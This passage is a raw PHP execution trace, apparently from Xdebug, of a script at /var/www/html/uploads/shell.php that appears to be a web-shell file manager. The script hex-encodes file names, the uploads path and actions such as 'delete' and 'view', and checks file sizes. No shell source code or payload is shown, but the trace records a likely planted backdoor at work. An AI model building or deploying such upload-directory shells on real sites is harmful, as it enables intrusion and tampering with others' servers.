3 1458 0 0.050464 485288 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1458 1 0.050475 485328
3 1458 R 101
3 1459 0 0.050487 485288 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1459 1 0.050497 485360
3 1459 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1460 0 0.050526 485288 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1460 1 0.050537 485328
3 1460 R 112
3 1461 0 0.050549 485288 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1461 1 0.050560 485360
3 1461 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1462 0 0.050589 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1462 1 0.050600 485336
3 1462 R 101
3 1463 0 0.050612 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1463 1 0.050623 485368
3 1463 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1464 0 0.050651 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'n'
3 1464 1 0.050662 485336
3 1464 R 110
3 1465 0 0.050674 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 110
3 1465 1 0.050684 485368
3 1465 R '6e'
2 A /var/www/html/uploads/shell.php 19 $r .= '6e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1466 0 0.050713 485296 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1466 1 0.050729 485336
3 1466 R 100
3 1467 0 0.050741 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1467 1 0.050752 485368
3 1467 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1468 0 0.050781 485296 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1468 1 0.050792 485336
3 1468 R 46
3 1469 0 0.050805 485296 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1469 1 0.050816 485368
3 1469 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1470 0 0.050845 485304 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1470 1 0.050857 485344
3 1470 R 112
3 1471 0 0.050868 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1471 1 0.050879 485376
3 1471 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1472 0 0.050908 485304 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1472 1 0.050919 485344
3 1472 R 104
3 1473 0 0.050932 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1473 1 0.050943 485376
3 1473 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1474 0 0.050972 485304 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1474 1 0.050983 485344
3 1474 R 112
3 1475 0 0.050995 485304 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1475 1 0.051005 485376
3 1475 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1453 1 0.051034 485304
2 1453 R '70726570656e642e706870'
2 1476 0 0.051048 485384 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1477 0 0.051078 485384 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1477 1 0.051089 485424
3 1477 R 47
3 1478 0 0.051101 485384 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1478 1 0.051112 485456
3 1478 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1479 0 0.051142 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1479 1 0.051154 485456
3 1479 R 118
3 1480 0 0.051166 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1480 1 0.051177 485488
3 1480 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1481 0 0.051206 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1481 1 0.051217 485456
3 1481 R 97
3 1482 0 0.051229 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1482 1 0.051243 485488
3 1482 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1483 0 0.051273 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1483 1 0.051284 485456
3 1483 R 114
3 1484 0 0.051296 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1484 1 0.051307 485488
3 1484 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1485 0 0.051336 485424 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1485 1 0.051347 485464
3 1485 R 47
3 1486 0 0.051359 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1486 1 0.051370 485496
3 1486 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1487 0 0.051400 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1487 1 0.051411 485464
3 1487 R 119
3 1488 0 0.051423 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1488 1 0.051437 485496
3 1488 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1489 0 0.051466 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1489 1 0.051477 485464
3 1489 R 119
3 1490 0 0.051489 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1490 1 0.051500 485496
3 1490 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1491 0 0.051529 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1491 1 0.051540 485464
3 1491 R 119
3 1492 0 0.051552 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1492 1 0.051563 485496
3 1492 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1493 0 0.051591 485432 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1493 1 0.051602 485472
3 1493 R 47
3 1494 0 0.051614 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1494 1 0.051625 485504
3 1494 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1495 0 0.051654 485432 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1495 1 0.051665 485472
3 1495 R 104
3 1496 0 0.051678 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1496 1 0.051689 485504
3 1496 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1497 0 0.051717 485432 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1497 1 0.051729 485472
3 1497 R 116
3 1498 0 0.051741 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1498 1 0.051752 485504
3 1498 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1499 0 0.051780 485432 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1499 1 0.051791 485472
3 1499 R 109
3 1500 0 0.051802 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1500 1 0.051814 485504
3 1500 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1501 0 0.051843 485440 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1501 1 0.051854 485480
3 1501 R 108
3 1502 0 0.051866 485440 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1502 1 0.051877 485512
3 1502 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1503 0 0.051906 485440 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1503 1 0.051916 485480
3 1503 R 47
3 1504 0 0.051928 485440 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1504 1 0.051939 485512
3 1504 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1505 0 0.051968 485440 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1505 1 0.051979 485480
3 1505 R 117
3 1506 0 0.051990 485440 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1506 1 0.052001 485512
3 1506 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1507 0 0.052030 485440 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1507 1 0.052041 485480
3 1507 R 112
3 1508 0 0.052053 485440 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1508 1 0.052064 485512
3 1508 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1509 0 0.052092 485448 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1509 1 0.052103 485488
3 1509 R 108
3 1510 0 0.052115 485448 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1510 1 0.052126 485520
3 1510 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1511 0 0.052158 485448 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1511 1 0.052169 485488
3 1511 R 111
3 1512 0 0.052181 485448 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1512 1 0.052192 485520
3 1512 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1513 0 0.052220 485448 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1513 1 0.052231 485488
3 1513 R 97
3 1514 0 0.052243 485448 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1514 1 0.052254 485520
3 1514 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1515 0 0.052283 485448 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1515 1 0.052293 485488
3 1515 R 100
3 1516 0 0.052305 485448 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1516 1 0.052316 485520
3 1516 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1517 0 0.052345 485464 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1517 1 0.052356 485504
3 1517 R 115
3 1518 0 0.052368 485464 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1518 1 0.052379 485536
3 1518 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1476 1 0.052408 485464
2 1476 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1519 0 0.052423 485384 hex 1 /var/www/html/uploads/shell.php 128 1 'delete'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1520 0 0.052453 485384 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1520 1 0.052464 485424
3 1520 R 100
3 1521 0 0.052476 485384 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1521 1 0.052488 485456
3 1521 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1522 0 0.052517 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1522 1 0.052528 485456
3 1522 R 101
3 1523 0 0.052540 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1523 1 0.052551 485488
3 1523 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1524 0 0.052580 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1524 1 0.052591 485456
3 1524 R 108
3 1525 0 0.052603 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1525 1 0.052614 485488
3 1525 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1526 0 0.052643 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1526 1 0.052654 485456
3 1526 R 101
3 1527 0 0.052666 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1527 1 0.052678 485488
3 1527 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1528 0 0.052706 485424 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1528 1 0.052717 485464
3 1528 R 116
3 1529 0 0.052729 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1529 1 0.052741 485496
3 1529 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1530 0 0.052770 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1530 1 0.052781 485464
3 1530 R 101
3 1531 0 0.052793 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1531 1 0.052804 485496
3 1531 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1519 1 0.052835 485424
2 1519 R '64656c657465'
2 1532 0 0.052849 485384 hex 1 /var/www/html/uploads/shell.php 128 1 'prepend.php'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1533 0 0.052880 485384 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1533 1 0.052891 485424
3 1533 R 112
3 1534 0 0.052903 485384 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1534 1 0.052914 485456
3 1534 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1535 0 0.052943 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1535 1 0.052954 485456
3 1535 R 114
3 1536 0 0.052966 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1536 1 0.052977 485488
3 1536 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1537 0 0.053006 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1537 1 0.053018 485456
3 1537 R 101
3 1538 0 0.053030 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1538 1 0.053041 485488
3 1538 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1539 0 0.053069 485416 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1539 1 0.053080 485456
3 1539 R 112
3 1540 0 0.053092 485416 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1540 1 0.053103 485488
3 1540 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1541 0 0.053132 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1541 1 0.053143 485464
3 1541 R 101
3 1542 0 0.053155 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1542 1 0.053166 485496
3 1542 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1543 0 0.053195 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'n'
3 1543 1 0.053206 485464
3 1543 R 110
3 1544 0 0.053218 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 110
3 1544 1 0.053229 485496
3 1544 R '6e'
2 A /var/www/html/uploads/shell.php 19 $r .= '6e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1545 0 0.053258 485424 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1545 1 0.053270 485464
3 1545 R 100
3 1546 0 0.053281 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1546 1 0.053303 485496
3 1546 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1547 0 0.053333 485424 ord 0 /var/www/html/uploads/shell.php 19 1 '.'
3 1547 1 0.053344 485464
3 1547 R 46
3 1548 0 0.053357 485424 dechex 0 /var/www/html/uploads/shell.php 19 1 46
3 1548 1 0.053368 485496
3 1548 R '2e'
2 A /var/www/html/uploads/shell.php 19 $r .= '2e'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1549 0 0.053397 485432 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1549 1 0.053409 485472
3 1549 R 112
3 1550 0 0.053421 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1550 1 0.053432 485504
3 1550 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1551 0 0.053461 485432 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1551 1 0.053472 485472
3 1551 R 104
3 1552 0 0.053484 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1552 1 0.053495 485504
3 1552 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1553 0 0.053523 485432 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1553 1 0.053534 485472
3 1553 R 112
3 1554 0 0.053546 485432 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1554 1 0.053561 485504
3 1554 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1532 1 0.053590 485432
2 1532 R '70726570656e642e706870'
2 1555 0 0.053605 484416 is_file 0 /var/www/html/uploads/shell.php 124 1 '/var/www/html/uploads/shell.php'
2 1555 1 0.053622 484448
2 1555 R TRUE
2 1556 0 0.053636 484408 filesize 0 /var/www/html/uploads/shell.php 125 1 '/var/www/html/uploads/shell.php'
2 1556 1 0.053648 484448
2 1556 R 12394
1 A /var/www/html/uploads/shell.php 125 $sz = 12.103515625
2 1557 0 0.053672 484320 round 0 /var/www/html/uploads/shell.php 126 2 12.103515625 3
2 1557 1 0.053684 484392
2 1557 R 12.104
1 A /var/www/html/uploads/shell.php 126 $sz = 12.104
1 A /var/www/html/uploads/shell.php 127 $sz = '12.104KB'
2 1558 0 0.053719 484360 hex 1 /var/www/html/uploads/shell.php 128 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1559 0 0.053749 484360 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1559 1 0.053760 484400
3 1559 R 47
3 1560 0 0.053772 484360 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1560 1 0.053784 484432
3 1560 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1561 0 0.053815 484392 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1561 1 0.053826 484432
3 1561 R 118
3 1562 0 0.053838 484392 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1562 1 0.053850 484464
3 1562 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1563 0 0.053879 484392 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1563 1 0.053891 484432
3 1563 R 97
3 1564 0 0.053903 484392 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1564 1 0.053914 484464
3 1564 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1565 0 0.053943 484392 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 1565 1 0.053954 484432
3 1565 R 114
3 1566 0 0.053966 484392 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 1566 1 0.053977 484464
3 1566 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1567 0 0.054006 484400 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1567 1 0.054018 484440
3 1567 R 47
3 1568 0 0.054030 484400 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1568 1 0.054041 484472
3 1568 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1569 0 0.054070 484400 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1569 1 0.054081 484440
3 1569 R 119
3 1570 0 0.054093 484400 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1570 1 0.054104 484472
3 1570 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1571 0 0.054133 484400 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1571 1 0.054144 484440
3 1571 R 119
3 1572 0 0.054156 484400 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1572 1 0.054167 484472
3 1572 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1573 0 0.054196 484400 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1573 1 0.054207 484440
3 1573 R 119
3 1574 0 0.054219 484400 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1574 1 0.054230 484472
3 1574 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1575 0 0.054258 484408 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1575 1 0.054272 484448
3 1575 R 47
3 1576 0 0.054285 484408 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1576 1 0.054296 484480
3 1576 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1577 0 0.054326 484408 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 1577 1 0.054337 484448
3 1577 R 104
3 1578 0 0.054349 484408 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 1578 1 0.054360 484480
3 1578 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1579 0 0.054389 484408 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 1579 1 0.054400 484448
3 1579 R 116
3 1580 0 0.054413 484408 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 1580 1 0.054424 484480
3 1580 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1581 0 0.054452 484408 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 1581 1 0.054466 484448
3 1581 R 109
3 1582 0 0.054478 484408 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 1582 1 0.054489 484480
3 1582 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1583 0 0.054518 484416 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1583 1 0.054531 484456
3 1583 R 108
3 1584 0 0.054543 484416 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1584 1 0.054553 484488
3 1584 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1585 0 0.054584 484416 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 1585 1 0.054595 484456
3 1585 R 47
3 1586 0 0.054607 484416 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 1586 1 0.054618 484488
3 1586 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1587 0 0.054647 484416 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 1587 1 0.054658 484456
3 1587 R 117
3 1588 0 0.054670 484416 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 1588 1 0.054681 484488
3 1588 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1589 0 0.054710 484416 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 1589 1 0.054721 484456
3 1589 R 112
3 1590 0 0.054733 484416 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 1590 1 0.054744 484488
3 1590 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1591 0 0.054773 484424 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 1591 1 0.054784 484464
3 1591 R 108
3 1592 0 0.054796 484424 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 1592 1 0.054807 484496
3 1592 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1593 0 0.054836 484424 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 1593 1 0.054847 484464
3 1593 R 111
3 1594 0 0.054859 484424 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 1594 1 0.054870 484496
3 1594 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1595 0 0.054899 484424 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 1595 1 0.054910 484464
3 1595 R 97
3 1596 0 0.054922 484424 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 1596 1 0.054933 484496
3 1596 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1597 0 0.054962 484424 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 1597 1 0.054973 484464
3 1597 R 100
3 1598 0 0.054989 484424 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 1598 1 0.055000 484496
3 1598 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1599 0 0.055029 484440 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1599 1 0.055040 484480
3 1599 R 115
3 1600 0 0.055052 484440 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 1600 1 0.055063 484512
3 1600 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1558 1 0.055091 484440
2 1558 R '2f7661722f7777772f68746d6c2f75706c6f616473'
2 1601 0 0.055106 484456 hex 1 /var/www/html/uploads/shell.php 128 1 'view'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1602 0 0.055136 484456 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 1602 1 0.055147 484496
3 1602 R 118
3 1603 0 0.055160 484456 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 1603 1 0.055171 484528
3 1603 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1604 0 0.055200 484488 ord 0 /var/www/html/uploads/shell.php 19 1 'i'
3 1604 1 0.055212 484528
3 1604 R 105
3 1605 0 0.055224 484488 dechex 0 /var/www/html/uploads/shell.php 19 1 105
3 1605 1 0.055235 484560
3 1605 R '69'
2 A /var/www/html/uploads/shell.php 19 $r .= '69'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1606 0 0.055271 484488 ord 0 /var/www/html/uploads/shell.php 19 1 'e'
3 1606 1 0.055282 484528
3 1606 R 101
3 1607 0 0.055295 484488 dechex 0 /var/www/html/uploads/shell.php 19 1 101
3 1607 1 0.055306 484560
3 1607 R '65'
2 A /var/www/html/uploads/shell.php 19 $r .= '65'
2 A /var/www/html/uploads/shell.php 18 $i++
3 1608 0 0.055335 484488 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 1608 1 0.055346 484528
3 1608 R 119
3 1609 0 0.055358 484488 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 1609 1 0.055368 484560
3 1609 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
2 1601 1 0.055397 484496
2 1601 R '76696577'
2 1610 0 0.055410 484472 hex 1 /var/www/html/uploads/shell.php 128 1 'shell.php'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 1611 0 0.055440 484472 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 1611 1 0.055451 484512
3 1611 R 115
3 1612 0 0.055464 484472 dechex 0 /var/www/html/uploads/shell.php 19 1 115
